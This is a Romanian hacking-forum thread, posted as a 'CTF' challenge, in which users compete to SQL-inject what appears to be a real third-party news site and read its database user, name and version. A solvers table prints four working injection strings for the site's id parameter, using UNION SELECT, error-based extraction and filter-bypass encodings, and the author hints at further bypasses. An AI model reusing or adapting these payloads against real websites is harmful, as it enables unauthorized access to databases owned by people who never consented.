Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Wubi

[Easy/Medium]SQLi 3

By Wubi, in Challenges (CTF)

Recommended Posts

Wubi Newbie

Wubi

Posted
Posted (edited)

Nu...

Target: News: Scene sexy per Alanis - Newsic

Metoda: Union Based

Cerinte: User(),Database() sau Version().

Proof:

98084777.png

Site-ul e gasit de Sheyken...

[TABLE=class: grid, width: 800]

[TR]

[TD]Solvers:[/TD]

[TD]Syntax:[/TD]

[/TR]

[TR]

[TD]Sheyken[/TD]

[TD]+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

[/TD]

[/TR]

[TR]

[TD]fallen_angel[/TD]

[TD]?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-

[/TD]

[/TR]

[TR]

[TD]neo.hapsis[/TD]

[TD]?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30--

[/TD]

[/TR]

[TR]

[TD]Sweby[/TD]

[TD]?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/*

[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[/TABLE]

Edited by Wubi
EterNo Newbie

EterNo

Posted
Posted

ar fi frumos dupa ce terminati competitia sa postati si o syntaxa sa intelegem si noi, eu numaru de coloane am reusit sa-l gasesc da dupa imi da ACCES NEGAT cand scriu select ~X(

Wubi Newbie

Wubi

Posted
  • Author
Posted
  EterNo said:
ar fi frumos dupa ce terminati competitia sa postati si o syntaxa sa intelegem si noi, eu numaru de coloane am reusit sa-l gasesc da dupa imi da ACCES NEGAT cand scriu select ~X(

Daca ai fi urmarit challenge-urile precedente(https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), ori chiar mai atent tabelul cu solveri din primul post, al 2lea row este dedicat sintaxelor folosite. Cand voi decide sa termin challenge-ul voi adauga si sintaxele. Pana atunci mai incearca, hint: bypass.

Guest
This topic is now closed to further replies.
Go to topic listing
×
×
  • Create New...